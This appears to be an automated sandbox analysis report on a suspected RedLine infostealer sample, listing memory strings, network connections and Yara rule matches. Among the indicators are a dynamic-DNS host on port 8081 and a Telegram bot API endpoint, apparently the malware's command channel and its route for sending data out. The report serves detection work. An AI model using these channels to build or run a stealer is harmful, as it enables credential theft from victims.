Source: jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1685509662.0000000021428000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1708111218.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1708692910.0000000021700000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707383794.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1685805076.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681034392.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.0.dr	String found in binary or memory: http://www.pmail.com0
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B680000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025470000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A240000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B600000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142559161.0000000027B24000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142010793.0000000027AFA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142010793.0000000027AAC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3168912288.0000000027B22000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3169435393.0000000027B22000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.2027254818.0000000027B24000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3402399115.000000002D02D000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4142897409.000000002D02D000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4142897409.000000002D092000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3402272086.000000002D092000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: jphwmyiA.pif, 00000003.00000002.4139743451.000000002644C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265FC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265AE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026704000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026623000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026844000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3CC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B4D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B37E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B614000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3F3000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4141083059.000000002B21C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C73E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C78C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C7B3000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C894000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C9D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4137744136.000000001C5DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000266DF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265B4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026589000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4139743451.0000000026427000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265FE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000267FC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B359000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4141083059.000000002B1F7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B5CC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3CE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B384000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B4AF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C78E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C719000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C744000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4137744136.000000001C5B7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C86F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C98E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: jphwmyiA.pif, 00000003.00000002.4139743451.000000002644C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265FC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265AE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026704000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026623000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026844000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3CC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B4D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B37E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B614000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3F3000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4141083059.000000002B21C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C73E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C78C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C7B3000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C894000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C9D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4137744136.000000001C5DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000266DF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265B4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026589000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4139743451.0000000026427000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265FE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000267FC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B359000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4141083059.000000002B1F7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B5CC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3CE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B384000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B4AF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C78E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C719000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C744000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4137744136.000000001C5B7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C86F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C98E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49794 version: TLS 1.2

Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 3808, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.2.Aiymwhpj.PIF.213367a8.7.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
